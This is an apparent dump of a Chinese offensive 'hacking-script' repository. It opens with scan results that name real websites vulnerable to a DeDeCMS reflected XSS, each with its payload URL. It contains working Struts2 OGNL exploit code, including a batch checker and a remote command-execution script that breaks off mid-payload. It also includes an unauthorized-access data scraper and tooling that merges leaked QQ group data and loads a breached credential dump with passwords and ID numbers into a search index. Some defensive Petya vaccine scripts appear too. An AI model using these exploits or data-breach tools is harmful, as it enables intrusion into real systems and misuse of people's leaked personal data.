    http://www.shlst.cn/dedecms_swfupload_xss.py.pyDeDeCMS swfupload.swf反射xsshttps://phpinfo.mehttp://www.shlst.cn/存在dedecms swfupload反射xss,验证url:http://www.shlst.cn//images/swfupload/swfupload.swf?movieName=%22]%29}catch%28e%29{if%28!window.x%29{window.x=1;alert%28%22xss%22%29}}//website
    http://chinasolarbolt.com/dedecms_swfupload_xss.py.pyDeDeCMS swfupload.swf反射xsshttps://phpinfo.mehttp://chinasolarbolt.com/存在dedecms swfupload反射xss,验证url:http://chinasolarbolt.com//images/swfupload/swfupload.swf?movieName=%22]%29}catch%28e%29{if%28!window.x%29{window.x=1;alert%28%22xss%22%29}}//website
    http://www.11250.net/dedecms_swfupload_xss.py.pyDeDeCMS swfupload.swf反射xsshttps://phpinfo.mehttp://www.11250.net/存在dedecms swfupload反射xss,验证url:http://www.11250.net//images/swfupload/swfupload.swf?movieName=%22]%29}catch%28e%29{if%28!window.x%29{window.x=1;alert%28%22xss%22%29}}//website
    http://www.shanghainanke.cn/dedecms_swfupload_xss.py.pyDeDeCMS swfupload.swf反射xsshttps://phpinfo.mehttp://www.shanghainanke.cn/存在dedecms swfupload反射xss,验证url:http://www.shanghainanke.cn//images/swfupload/swfupload.swf?movieName=%22]%29}catch%28e%29{if%28!window.x%29{window.x=1;alert%28%22xss%22%29}}//website
    http://www.22266666.com/dedecms_swfupload_xss.py.pyDeDeCMS swfupload.swf反射xsshttps://phpinfo.mehttp://www.22266666.com/存在dedecms swfupload反射xss,验证url:http://www.22266666.com//images/swfupload/swfupload.swf?movieName=%22]%29}catch%28e%29{if%28!window.x%29{window.x=1;alert%28%22xss%22%29}}//website
    "; 40 | echo ""; 41 | for($i=0;$i<$count;++$i){ 42 | echo ""; 43 | } 44 | while($rel=mysql_fetch_array($result4)){ 45 | echo ""; 46 | for($i=0;$i<$count;++$i){ 47 | $field_name=mysql_field_name($result4,$i); 48 | echo ""; 49 | } 50 | echo ""; 51 | } 52 | echo ""; 53 | echo "
    ".mysql_field_name($result4,$i)."
    ".$rel[$field_name]."
    "; 54 | } 55 | ?> -------------------------------------------------------------------------------- /nopetyavac.bat: -------------------------------------------------------------------------------- 1 | @echo off 2 | REM Administrative check from here: https://stackoverflow.com/questions/4051883/batch-script-how-to-check-for-admin-rights 3 | REM Vaccination discovered by twitter.com/0xAmit/status/879778335286452224 4 | REM Batch file created by Lawrence Abrams of BleepingComputer.com. @bleepincomputer @lawrenceabrams 5 | 6 | echo Administrative permissions required. Detecting permissions... 7 | echo. 8 | 9 | net session >nul 2>&1 10 | 11 | if %errorLevel% == 0 ( 12 | if exist C:\Windows\perfc ( 13 | echo Computer already vaccinated for NotPetya/Petya/Petna/SortaPetya. 14 | echo. 15 | ) else ( 16 | echo This is a NotPetya/Petya/Petna/SortaPetya Vaccination file. Do not remove as it protects you from being encrypted by Petya. > C:\Windows\perfc 17 | echo This is a NotPetya/Petya/Petna/SortaPetya Vaccination file. Do not remove as it protects you from being encrypted by Petya. > C:\Windows\perfc.dll 18 | echo This is a NotPetya/Petya/Petna/SortaPetya Vaccination file. Do not remove as it protects you from being encrypted by Petya. > C:\Windows\perfc.dat 19 | 20 | attrib +R C:\Windows\perfc 21 | attrib +R C:\Windows\perfc.dll 22 | attrib +R C:\Windows\perfc.dat 23 | 24 | echo Computer vaccinated for current version of NotPetya/Petya/Petna/SortaPetya. 25 | echo. 26 | ) 27 | ) else ( 28 | echo Failure: You must run this batch file as Administrator. 
29 | ) 30 | 31 | pause 32 | -------------------------------------------------------------------------------- /nsa应急策略.bat: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuian/hacking-script/8e768ce1476f192710e02f9c37b584d70a88303d/nsa应急策略.bat -------------------------------------------------------------------------------- /petya系列勒索木马免疫脚本.bat: -------------------------------------------------------------------------------- 1 | @echo off 2 | echo 请以管理员权限启动该免疫脚本.. 3 | echo. 4 | net session >nul 2>&1 5 | 6 | if %errorLevel% == 0 ( 7 | if exist C:\Windows\perfc ( 8 | echo 已经创建过*Petya免疫文件. 9 | echo. 10 | ) else ( 11 | echo 这是一个免疫NotPetya/Petya/Petna/SortaPetya勒索病毒的文件,不要删除,能避免电脑中招 by x > C:\Windows\perfc 12 | echo 这是一个免疫NotPetya/Petya/Petna/SortaPetya勒索病毒的文件,不要删除,能避免电脑中招 by x > C:\Windows\perfc.dll 13 | echo 这是一个免疫NotPetya/Petya/Petna/SortaPetya勒索病毒的文件,不要删除,能避免电脑中招 by x > C:\Windows\perfc.dat 14 | 15 | attrib +R C:\Windows\perfc 16 | attrib +R C:\Windows\perfc.dll 17 | attrib +R C:\Windows\perfc.dat 18 | 19 | echo 免疫类型:NotPetya/Petya/Petna/SortaPetya. 20 | echo. 
21 | ) 22 | ) else ( 23 | echo 失败:请以管理员身份运行改程序 24 | ) 25 | 26 | pause -------------------------------------------------------------------------------- /phpcms_getshell.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuian/hacking-script/8e768ce1476f192710e02f9c37b584d70a88303d/phpcms_getshell.exe -------------------------------------------------------------------------------- /plink用法.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuian/hacking-script/8e768ce1476f192710e02f9c37b584d70a88303d/plink用法.txt -------------------------------------------------------------------------------- /portscan.py: -------------------------------------------------------------------------------- 1 | #~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~# 2 | 3 | #+--------------------+ 4 | #|Creators : | 5 | #|-Drarqua GHS Storm | 6 | #|-Rebel Yell | 7 | #+--------------------+ 8 | 9 | #~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~# 10 | 11 | import time 12 | import socket 13 | import os 14 | import sys 15 | import string 16 | 17 | #~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~# 18 | 19 | def restart_program(): 20 | python = sys.executable 21 | os.execl(python, python, * sys.argv) 22 | curdir = os.getcwd() 23 | 24 | #~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~# 25 | 26 | address = raw_input( "Choose your target:" ) 27 | start = input( "From port:" ) 28 | stop = input( "To port:" ) 29 | openportsL = [] 30 | def portscan(address, port): 31 | ps = socket.socket() 32 | print ("Searching for open ports") 33 | try: 34 | ps.connect((address, port)) 35 | print ("[Port %s is OPEN.]") %(port) 36 | openportsL[1:1] = [port] 37 | return True 38 | except socket.error, msg: 39 | return False 40 | s.close() 41 | print ("Port Scan Started ... 
It may take time") 42 | for port in range(start, stop): 43 | portscan(address, port) 44 | print ("Port Scann completed") 45 | print ("The open ports are :") 46 | print ( openportsL ) 47 | if __name__ == "__main__": 48 | answer = raw_input("Do you want to Portscan again?") 49 | if answer.strip() in "y Y yes Yes YES".split(): 50 | restart_program() 51 | else: 52 | os.system(curdir+"\Deq\main.py") 53 | 54 | #~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~# -------------------------------------------------------------------------------- /python二级域名批量采集脚本/getsubdomain.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuian/hacking-script/8e768ce1476f192710e02f9c37b584d70a88303d/python二级域名批量采集脚本/getsubdomain.pdf -------------------------------------------------------------------------------- /python抓取谷歌链接工具/getlink.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuian/hacking-script/8e768ce1476f192710e02f9c37b584d70a88303d/python抓取谷歌链接工具/getlink.pdf -------------------------------------------------------------------------------- /python抓取谷歌链接工具/getlink.py: -------------------------------------------------------------------------------- 1 | #! 
/usr/bin/env python 2 | #coding=utf-8 3 | import urllib2,urllib,threading,Queue,os 4 | import msvcrt 5 | import simplejson 6 | import sys 7 | 8 | seachstr = raw_input("Key?:") 9 | pagenum = raw_input("How many?:") 10 | pagenum = int(pagenum)/8+1 11 | line = 5 12 | 13 | class googlesearch(threading.Thread): 14 | def __init__(self): 15 | threading.Thread.__init__(self) 16 | self.urls= [] 17 | 18 | def run(self): 19 | while 1: 20 | self.catchURL() 21 | queue.task_done() 22 | def catchURL(self): 23 | self.key = seachstr.decode('gbk').encode('utf-8') 24 | self.page= str(queue.get()) 25 | url = ('https://ajax.googleapis.com/ajax/services/search/web?v=1.0&q=%s&rsz=8&start=%s') % (urllib.quote(self.key),self.page) 26 | try: 27 | request = urllib2.Request(url) 28 | response = urllib2.urlopen(request) 29 | results = simplejson.load(response) 30 | URLinfo = results['responseData']['results'] 31 | except Exception,e: 32 | print e 33 | else: 34 | for info in URLinfo: 35 | print info['url'] 36 | 37 | class ThreadGetKey(threading.Thread): 38 | def run(self): 39 | while 1: 40 | try: 41 | chr = msvcrt.getch() 42 | if chr == 'q': 43 | print "stopped by your action ( q )" 44 | os._exit(1) 45 | else: 46 | continue 47 | except: 48 | os._exit(1) 49 | 50 | if __name__ == '__main__': 51 | pages=[] 52 | queue = Queue.Queue() 53 | 54 | for i in range(1,pagenum+1): 55 | pages.append(i) 56 | 57 | for n in pages: 58 | queue.put(n) 59 | 60 | ThreadGetKey().start() 61 | 62 | for p in range(line): 63 | googlesearch().start() -------------------------------------------------------------------------------- /python未授权访问提取特定数据脚本.py: -------------------------------------------------------------------------------- 1 | import urllib.request 2 | import urllib.error 3 | from bs4 import BeautifulSoup 4 | 5 | x=0 6 | for i in range(1,1000): 7 | url = 'http://xxx.xxx.xxx?id='+str(i) 8 | x+=1 9 | try: 10 | html = urllib.request.urlopen(url) #定义地址 11 | soup = BeautifulSoup(html,"lxml") #使用BeautifulSoup接受url参数 
12 | soup1 = soup.find(id="nsrsbh")#查找标签id值为nsrsbh 13 | nsbr = (soup1.get('value')) #获取标签内value属性的字符串 14 | print("获取到第"+str(i)+"条数据:"+nsbr) 15 | except urllib.error.URLError as e: #异常捕获 16 | if hasattr(e,"code"): 17 | print(e.code) 18 | if hasattr(e,"reason"): 19 | print(e.reason) -------------------------------------------------------------------------------- /python版本的小葵转换工具.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuian/hacking-script/8e768ce1476f192710e02f9c37b584d70a88303d/python版本的小葵转换工具.py -------------------------------------------------------------------------------- /qq.rar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuian/hacking-script/8e768ce1476f192710e02f9c37b584d70a88303d/qq.rar -------------------------------------------------------------------------------- /qq群社工库处理.txt: -------------------------------------------------------------------------------- 1 | 为什么不花些时间都放在同一张表里,这样更方便啊 2 | 3 | INSERT INTO NewDB.dbo.Newtable(.......) SELECT (......) FROM GroupData1.dbo.Group1 4 | INSERT INTO NewDB.dbo.Newtable(.......) SELECT (......) FROM GroupData1.dbo.Group2 5 | ..... 6 | INSERT INTO NewDB.dbo.Newtable(.......) SELECT (......) FROM GroupData2.dbo.Group101 7 | INSERT INTO NewDB.dbo.Newtable(.......) SELECT (......) FROM GroupData2.dbo.Group102 8 | ..... 
9 | 10 | 以此类推,一共1100条,编辑好后放到查询分析器执行,我电脑耗时3个小时 11 | 12 | 之后针对QQ号和群号分别建立索引 13 | 14 | USE [NewDB] 15 | GO 16 | CREATE NONCLUSTERED INDEX [IDX_QQ_NUM] ON [dbo].[Newtable] 17 | ( 18 | [QQNum] ASC 19 | )WITH (STATISTICS_NORECOMPUTE = OFF, SORT_IN_TEMPDB = OFF, IGNORE_DUP_KEY = OFF, DROP_EXISTING = OFF, ONLINE = OFF, ALLOW_ROW_LOCKS = ON, ALLOW_PAGE_LOCKS = ON) ON [PRIMARY] 20 | GO 21 | 22 | 23 | 24 | USE [NewDB] 25 | GO 26 | CREATE NONCLUSTERED INDEX [IDX_QUN_NUM] ON [dbo].[Newtable] 27 | ( 28 | [QunNum] ASC 29 | )WITH (STATISTICS_NORECOMPUTE = OFF, SORT_IN_TEMPDB = OFF, IGNORE_DUP_KEY = OFF, DROP_EXISTING = OFF, ONLINE = OFF, ALLOW_ROW_LOCKS = ON, ALLOW_PAGE_LOCKS = ON) ON [PRIMARY] 30 | GO 31 | 32 | 每个索引建立时间大约3个小时。(索引建立要放在查询分析器用命令执行,不要使用GUI,数据量太大,会提示超时) 33 | 34 | 这样弄好后就是一个库一个表,可以实现瞬间反馈查询结果了 35 | 36 | 批处理合并 37 | group合并 38 | ::合并所有表 39 | @echo off 40 | del /f /q 1.sql 41 | setlocal Enabledelayedexpansion 42 | set p=0 43 | for /l %%i in (1,1,11) do ( 44 | for /l %%j in (1,1,100) do ( 45 | set /a p=!p!+1 46 | echo INSERT INTO qqinfo.dbo.qqinfo^([QQNum],[Nick],[Age],[Gender],[Auth],[QunNum]^) SELECT [QQNum],[Nick] ,[Age] ,[Gender] ,[Auth],[QunNum] FROM GroupData%%i.dbo.Group!p!>>1.sql 47 | echo go>>1.sql 48 | ) 49 | 50 | ) 51 | 52 | osql -E -i 1.sql 53 | 54 | 55 | qunlist合并 56 | 57 | ::合并所有表 58 | @echo off 59 | del /f /q 1.sql 60 | setlocal Enabledelayedexpansion 61 | set p=0 62 | for /l %%i in (1,1,11) do ( 63 | for /l %%j in (1,1,10) do ( 64 | set /a p=!p!+1 65 | echo INSERT INTO qqinfo.dbo.quninfo^([QunNum],[MastQQ],[CreateDate],[Title],[Class],[QunText]^) SELECT [QunNum],[MastQQ],[CreateDate],[Title],[Class],[QunText] FROM QunInfo%%i.dbo.QunList!p!>>1.sql 66 | echo go>>1.sql 67 | ) 68 | 69 | ) 70 | 71 | osql -E -i 1.sql -------------------------------------------------------------------------------- /qunlist.bat: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/tuian/hacking-script/8e768ce1476f192710e02f9c37b584d70a88303d/qunlist.bat -------------------------------------------------------------------------------- /runassystem权限小工具.bat: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuian/hacking-script/8e768ce1476f192710e02f9c37b584d70a88303d/runassystem权限小工具.bat -------------------------------------------------------------------------------- /s2批量检测.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding: utf-8 -*- 3 | import requests 4 | import sys 5 | 6 | def s2exp(url,types): 7 | s2_016payload = "redirect:${%23req%3d%23context.get(%27co%27%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletReq%27%2b%27uest%27),%23resp%3d%23context.get(%27co%27%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletRes%27%2b%27ponse%27),%23resp.setCharacterEncoding(%27UTF-8%27),%23resp.getWriter().print(%22web%22),%23resp.getWriter().print(%22path88888887:%22),%23resp.getWriter().print(%23req.getSession().getServletContext().getRealPath(%22/%22)),%23resp.getWriter().flush(),%23resp.getWriter().close()}" 8 | s2_019payload = "debug=command&expression=%23req%3d%23context.get(%27co%27%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletReq%27%2b%27uest%27),%23resp%3d%23context.get(%27co%27%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletRes%27%2b%27ponse%27),%23resp.setCharacterEncoding(%27UTF-8%27),%23resp.getWriter().print(%22web%22),%23resp.getWriter().print(%22path88888887:%22),%23resp.getWriter().print(%23req.getSession().getServletContext().getRealPath(%22/%22)),%23resp.getWriter().flush(),%23resp.getWriter().close()" 9 | s2_032payload = 
"method:%23_memberAccess%[email]3d@ognl.OgnlContext[/email]@DEFAULT_MEMBER_ACCESS,%23w%3d%23context.get(%23parameters.rpsobj[0]),%23w.getWriter().println(88888888-1),%23w.getWriter().flush(),%23w.getWriter().close(),1?%23xx:%23request.toString&reqobj=com.opensymphony.xwork2.dispatcher.HttpServletRequest&rpsobj=com.opensymphony.xwork2.dispatcher.HttpServletResponse" 10 | s2_devmode = "debug=browser&object=(%23mem=%23_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)%3f%23context[%23parameters.rpsobj[0]].getWriter().println(%23parameters.content[0]):xx.toString.json&rpsobj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&content=88888887" 11 | if types == "032": 12 | payload = s2_032payload 13 | elif types == "016": 14 | payload = s2_016payload 15 | elif types == "s2_devmode": 16 | payload = s2_devmode 17 | else: 18 | payload = s2_019payload 19 | try: 20 | headers = {"Content-types":"application/x-www-form-urlencoded"} 21 | r = requests.post(url,data=payload,headers=headers,timeout=5) 22 | res = r.text 23 | if res.find("88888887") <> -1: 24 | f = open("result.txt","a") 25 | f.write(l.strip() + " [s2-" + types + "]\r\n\r\n") 26 | print "\n[+]%s vulnerability exits s2-%s!" 
% (l.strip(),types), 27 | return true 28 | else: 29 | print "\n[-]%s Not s2-%s vulnerability" % (url,types), 30 | return False 31 | except: 32 | print "\n[-]%s timeout" % url, 33 | return False 34 | 35 | if __name__ == "__main__": 36 | if len(sys.argv) < 2: 37 | print "Example: python exp.py list.txt" 38 | exit() 39 | weblist = sys.argv[1] 40 | f = open(weblist) 41 | for l in f.readlines(): 42 | url = l.strip() 43 | s2exp(url,"032") 44 | s2exp(url,"016") 45 | s2exp(url,"019") 46 | s2exp(url,"s2_devmode") -------------------------------------------------------------------------------- /sgk数据清洗/BigDupRemove.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuian/hacking-script/8e768ce1476f192710e02f9c37b584d70a88303d/sgk数据清洗/BigDupRemove.zip -------------------------------------------------------------------------------- /sgk数据清洗/es_import-master/.gitignore: -------------------------------------------------------------------------------- 1 | # Byte-compiled / optimized / DLL files 2 | __pycache__/ 3 | *.py[cod] 4 | *$py.class 5 | 6 | # C extensions 7 | *.so 8 | 9 | # Distribution / packaging 10 | .Python 11 | env/ 12 | build/ 13 | develop-eggs/ 14 | dist/ 15 | downloads/ 16 | eggs/ 17 | .eggs/ 18 | lib/ 19 | lib64/ 20 | parts/ 21 | sdist/ 22 | var/ 23 | *.egg-info/ 24 | .installed.cfg 25 | *.egg 26 | 27 | # PyInstaller 28 | # Usually these files are written by a python script from a template 29 | # before PyInstaller builds the exe, so as to inject date/other infos into it. 
30 | *.manifest 31 | *.spec 32 | 33 | # Installer logs 34 | pip-log.txt 35 | pip-delete-this-directory.txt 36 | 37 | # Unit test / coverage reports 38 | htmlcov/ 39 | .tox/ 40 | .coverage 41 | .coverage.* 42 | .cache 43 | nosetests.xml 44 | coverage.xml 45 | *,cover 46 | .hypothesis/ 47 | 48 | # Translations 49 | *.mo 50 | *.pot 51 | 52 | # Django stuff: 53 | *.log 54 | local_settings.py 55 | 56 | # Flask stuff: 57 | instance/ 58 | .webassets-cache 59 | 60 | # Scrapy stuff: 61 | .scrapy 62 | 63 | # Sphinx documentation 64 | docs/_build/ 65 | 66 | # PyBuilder 67 | target/ 68 | 69 | # IPython Notebook 70 | .ipynb_checkpoints 71 | 72 | # pyenv 73 | .python-version 74 | 75 | # celery beat schedule file 76 | celerybeat-schedule 77 | 78 | # dotenv 79 | .env 80 | 81 | # virtualenv 82 | venv/ 83 | ENV/ 84 | 85 | # Spyder project settings 86 | .spyderproject 87 | 88 | # Rope project settings 89 | .ropeproject 90 | -------------------------------------------------------------------------------- /sgk数据清洗/es_import-master/LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2017 vermouth 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. 
IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /sgk数据清洗/es_import-master/README.md: -------------------------------------------------------------------------------- 1 | # es_import 2 | 社工库信息(csv,excel,sql)导入es 3 | -------------------------------------------------------------------------------- /sgk数据清洗/es_import-master/es_import.py: -------------------------------------------------------------------------------- 1 | # coding=utf-8 2 | from elasticsearch import Elasticsearch 3 | from elasticsearch import helpers 4 | import csv 5 | import traceback 6 | 7 | 8 | def csv_import(): 9 | try: 10 | es = Elasticsearch() 11 | actions = [] 12 | i = 1 13 | with open('xiaomi_com.csv') as reader: 14 | for line in reader: 15 | action = { 16 | "_index": "xiaomi_", 17 | "_type": "xiaomi_user", 18 | "_id": i, 19 | "_source": { 20 | u"id": line[0].decode('utf8'), 21 | u"账户名": line[1].decode('utf8'), 22 | u"密码": line[2].decode('utf8'), 23 | u"email": line[3].decode('utf8'), 24 | u"ip地址": line[4].decode('utf8'), 25 | u"号码": line[5].decode('utf8'), 26 | u"身份证号": line[6].decode('utf8'), 27 | u"年龄": line[7].decode('utf8'), 28 | u"月份": line[8].decode('utf8'), 29 | u"年份": line[9].decode('utf8'), 30 | u"姓氏": line[10].decode('utf8') 31 | } 32 | } 33 | i += 1 34 | actions.append(action) 35 | if len(actions) == 500: 36 | helpers.bulk(es, actions) 37 | del actions[0:len(actions)] 38 | if len(actions) > 0: 39 | helpers.bulk(es, actions) 40 | except: 41 | traceback.print_exc() 42 | 43 | 44 | if __name__ == '__main__': 45 | csv_import() -------------------------------------------------------------------------------- /sgk数据清洗/quchong.py: 
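--------------------------------------------------------------------------------
#coding=utf-8
"""Extract word-like tokens from a text file and write the unique ones out."""

import sys, re, os

def getDictList(dict):
    """Return every token found in the file named by *dict*.

    A token is a run of word characters and the punctuation listed in the
    character class below; whitespace and any other character separate
    tokens. The whole file is read into memory at once.
    """
    regx = '''[\w\~`\!\@\#\$\%\^\&\*\(\)\_\-\+\=\[\]\{\}\:\;\,\.\/\<\>\?]+'''
    with open(dict) as f:
        data = f.read()
    return re.findall(regx, data)

def rmdp(dictList):
    """Return the distinct items of *dictList*; the order is not preserved."""
    return list(set(dictList))

def fileSave(dictRmdp, out):
    """Append each item of *dictRmdp* to the file *out*, one per line.

    The file is opened in append mode, so running the tool twice against
    the same output file accumulates entries instead of replacing them.
    """
    with open(out, 'a') as f:
        for line in dictRmdp:
            f.write(line + '\n')

def main():
    """Read the input and output paths from argv and run the de-duplication."""
    try:
        src = sys.argv[1].strip()
        out = sys.argv[2].strip()
    except IndexError as e:
        # Fewer than two arguments: show usage instead of a traceback.
        print 'error:', e
        me = os.path.basename(__file__)
        print 'usage: %s ' %me
        print 'example: %s dict.txt dict_rmdp.txt' %me
        sys.exit()

    dictList = getDictList(src)
    dictRmdp = rmdp(dictList)
    fileSave(dictRmdp, out)

if __name__ == '__main__':
    main()
--------------------------------------------------------------------------------
/sgk数据清洗/去重.py:
--------------------------------------------------------------------------------
#!/usr/bin/env python
# encoding: utf-8

# Line de-duplication helper. Step 1 appends every file named on the command
# line to why.txt; step 2 writes the unique lines of duowan_user.txt to
# whynot.txt.
# NOTE(review): step 2 reads a hard-coded file, not the why.txt produced by
# step 1 -- confirm which input was intended.
import sys
import os
import platform
import shutil


why = 'why.txt'
for other in sys.argv[1:]:
    if not os.path.exists(other):
        print other + ' file not find'
        sys.exit()
    # Append with plain file I/O instead of building a "type"/"cat" shell
    # command from the argument: a file name containing spaces or shell
    # metacharacters would otherwise be interpreted by the shell.
    with open(other, 'rb') as src:
        with open(why, 'ab') as merged:
            shutil.copyfileobj(src, merged)

with open('duowan_user.txt', 'r') as yuan:
    # A set drops duplicates; the original line order is not kept.
    unique_lines = set(yuan.readlines())

with open('whynot.txt', 'w') as dirc:
    for line in unique_lines:
        if line == '' or line == '\r\n':
            continue
        dirc.write(line)
--------------------------------------------------------------------------------
/sgk数据清洗/去重可排序.py: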
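--------------------------------------------------------------------------------
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Author: Forsaken
"""Remove duplicate lines from a text file, optionally sorting the result.

The de-duplicated lines are written to ``new_<name>`` in the input file's
directory; the input file itself is not modified.
"""

import getopt
import os
import sys


def _unique_lines(lines):
    """Return *lines* without later duplicates, keeping first-seen order."""
    seen = set()
    kept = []
    for line in lines:
        if line not in seen:
            seen.add(line)
            kept.append(line)
    return kept


def main():
    """Parse the command line, de-duplicate the file and report the result.

    Exits with status 2 on a usage error and 1 when the input file does
    not exist.
    """
    try:
        opts, args = getopt.getopt(sys.argv[1:], 'hf:s', ['help', 'file=', 'sort'])
    except getopt.GetoptError as e:
        print('[-] %s' % e)
        usage()
        sys.exit(2)

    path = ''
    want_sort = False

    for o, a in opts:
        if o in ('-h', '--help'):
            usage()
            sys.exit()
        elif o in ('-f', '--file'):
            path = a
        elif o in ('-s', '--sort'):
            want_sort = True

    if not path:
        print('[-] File Arguments Not Found!')
        usage()
        sys.exit(2)

    if not os.path.exists(path):
        print('[-] File Not Found!')
        sys.exit(1)

    with open(path, 'r') as f:
        old = f.readlines()

    # Lines are compared with their terminator attached.
    # NOTE(review): a final line without a trailing newline is therefore
    # distinct from the same text followed by one, and after sorting it can
    # be written directly in front of the next line.
    new = _unique_lines(old)
    delete = len(old) - len(new)

    if want_sort:
        new.sort()

    # Prefix the file name, not the whole path, so that an input such as
    # "dir/words.txt" is written to "dir/new_words.txt".
    out = os.path.join(os.path.dirname(path), 'new_' + os.path.basename(path))
    with open(out, 'w') as f:
        f.writelines(new)

    print('Delete %s Line' % delete)
    print('Please Check %s' % out)


def usage():
    """Print the command-line help text."""
    print('Usage: python %s [options]' % sys.argv[0])
    print('')
    print('Options:')
    print(' -h, --help Show Help Message And Exit')
    print(' -f FILE, --file=FILE File')
    print(' -s, --sort Sort')


if __name__ == '__main__':
    main()
--------------------------------------------------------------------------------
/sgk数据清洗/文本去重.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/tuian/hacking-script/8e768ce1476f192710e02f9c37b584d70a88303d/sgk数据清洗/文本去重.py
--------------------------------------------------------------------------------
/sgk数据清洗/文本去重工具.exe: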
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuian/hacking-script/8e768ce1476f192710e02f9c37b584d70a88303d/sgk数据清洗/文本去重工具.exe -------------------------------------------------------------------------------- /smtp爆破脚本.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuian/hacking-script/8e768ce1476f192710e02f9c37b584d70a88303d/smtp爆破脚本.py -------------------------------------------------------------------------------- /struts2/St2关键词.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuian/hacking-script/8e768ce1476f192710e02f9c37b584d70a88303d/struts2/St2关键词.txt -------------------------------------------------------------------------------- /struts2/Struts2多版本一次性检测工具V3.0.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuian/hacking-script/8e768ce1476f192710e02f9c37b584d70a88303d/struts2/Struts2多版本一次性检测工具V3.0.jar -------------------------------------------------------------------------------- /struts2/s02-46命令执行支持ssl_python源码.py: -------------------------------------------------------------------------------- 1 | #! 
/usr/bin/env python 2 | # encoding:utf-8 3 | # s02-46_ssl.py https://127.0.0.1/viewDetail.action "whoami"|more 4 | # 作者:pt007@vip.sina.com 5 | import urllib2,sys,getopt,ssl 6 | from poster.encode import multipart_encode 7 | from poster.streaminghttp import register_openers 8 | 9 | ssl._create_default_https_context = ssl._create_unverified_context 10 | type = sys.getfilesystemencoding() 11 | reload(sys) 12 | sys.setdefaultencoding(type) 13 | 14 | def poc(command): 15 | cmd1=command 16 | #print "cmd1=%s\n" %cmd1 17 | user_agent = "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36" 18 | #accept=" application/x-shockwave-flash, image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*" 19 | #length="10000000" 20 | type="multipart/form-data; boundary=---------------------------735323031399963166993862150" 21 | #data=data+'''Content-Disposition: form-data; name="upload";filename="%{#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('X-Test','Kaboom')}"''' 22 | data="-----------------------------735323031399963166993862150\r\nContent-Disposition: form-data; name=\"foo\"; filename=\"%{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='"+command+"').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new 
